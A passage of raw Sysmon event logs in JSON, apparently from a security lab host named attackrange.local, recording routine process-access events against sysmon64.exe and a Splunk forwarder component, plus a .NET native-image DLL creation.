32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6573,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:55.698\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:55.698","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6574,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:55.698\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:55.698","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6575,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:55.698\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:55.698","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6576,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:55.698\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:55.698","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6577,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:55.698\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:55.698","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6578,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:55.698\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:55.698","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6579,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:55.698\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:55.698","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6580,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:55.698\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0463-5F25-0000-001066680C00}\r\nTargetProcessId: 616\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:55.698","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0463-5F25-0000-001066680C00}","TargetProcessId":"616","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6581,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:57:56.916\r\nProcessGuid: {A837DB8D-045A-5F25-0000-001009570C00}\r\nProcessId: 4728\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1278-0\\PresentationCore.dll\r\nCreationUtcTime: 2020-08-01 05:57:56.916","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 